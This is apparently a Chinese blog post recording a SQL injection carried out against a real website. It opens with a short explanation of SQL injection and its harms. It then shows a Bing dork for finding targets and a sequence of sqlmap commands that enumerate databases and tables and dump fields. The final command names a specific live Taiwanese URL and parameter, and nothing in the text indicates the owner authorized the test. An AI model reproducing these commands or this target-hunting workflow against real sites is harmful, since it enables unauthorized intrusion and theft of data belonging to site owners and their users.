记录一次对某网站的sql注入
目录
1.使用bing搜索site:tw inurl:php(site指定区域,inurl:url链接包含的内容)
2.打开网站发现存在一个id=xxx可能存在一个sql注入漏洞
一,SQL注入是什么
攻击者把 SQL 命令语句作为输入被服务器 SQL 解释器正确解析执行,数据库把查询到 的结果返回给服务器,然后呈现给攻击者,攻击者由此获得数据库内的数据信息。
二,SQL注入危害
数据库信息泄漏:数据库中存放的用户的隐私信息的泄露。 网页篡改:通过操作数据库对特定网页进行篡改。 网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。 数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被窜改。 服务器被远程控制,被安装后门。经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统。 SQL注入是危害WEB安全的主要攻击手段,存在SQL注入攻击的网站一但被攻击成功 后,产生的后果将有可能是毁灭性及不可恢复的。
三,对某网站的实测记录
1.使用bing搜索site:tw inurl:php(site指定区域,inurl:url链接包含的内容)
2.打开网站发现存在一个id=xxx可能存在一个sql注入漏洞
3.使用sqlmap工具进行注入检测
1)python sqlmap.py http://xxxxxx --batch (batch采用默认配置对提示进行设置)
发现存在一个get注入漏洞,那就可以直接进行get注入
2)查看数据库信息
python sqlmap.py http://xxxxxxxxxxxxxxx --batch --dbs (--dbs获取对方数据库所有库的名称)
发现存在两个数据库
3)查看数据库中所有表
python sqlmap.py http://xxxxxxxx --D information_schema --tables (获取information——schema库下的表)
4)查看表中的字段
python sqlmap.py http://xxxxxxxx --D information_schema -T USER_PRIVILEGES --columns (获取information_schema表,T USER_PRIVILEGES表中的字段)
5)爆破users表中特殊字段的信息
python sqlmap.py http://www.diffuser.com.tw/page.php?id=116 --batch -D information_schema -T USER_PRIVILEGES -C "GRANTEE,PRIVILEGE,IS_GRANTABLE,TABLE_CATALOG" --dump (导出数据指定的数据)
四,总结
根据客户端返回的结果来判断提交的测试语句是否成功被数据库引擎执行,如果测试 语句被执行了,说明存在注入漏洞 按参数类型分类,发现该网站输入数字型注入
相关文章
- 用WriteProcessMemory函数注入进程的流程
- SQL手工注入漏洞测试(Sql Server数据库)
- 网站被整改报告存在sql注入漏洞如何修复防护
- 【IOC 控制反转】Android 事件依赖注入 ( 事件依赖注入具体的操作细节 | 创建 事件监听器 对应的 动态代理 | 动态代理的数据准备 | 创建调用处理程序 | 创建动态代理实例对象 )
- SQL开发知识:sql注入过程详解
- SQL注入全过程深入分析
- 防御SQL注入的方法总结
- Sql Server中通过sql命令获取cpu占用及产生锁的sql
- sql注入数据库原理详情介绍
- 攻击MySQL字符注入攻击:防御技术与漏洞分析(mysql字符注入)
- Spring Boot 2 + JPA / Hibernate 5 注入 SessionFactory 的正确姿势详解编程语言
- 使用Oracle方言SQL简化数据处理(oracle方言sql)
- MySQL如何有效防止SQL注入攻击?(mysql防sql注入)
- sql 注入MSSQL防止SQL注入:强力防护的关键步骤(mssql阻止)
- 利用SQL查询Redis中的数据(用sql查询redis)
- 将数据存入Redis,注入无限可能性(数据存到redis里面)
- 解决MySQL不支持的SQL语句(mysql不支持的sql)
- PHP与SQL注入攻击[二]
- Sql学习第一天——SQL练习题(建表/sql语句)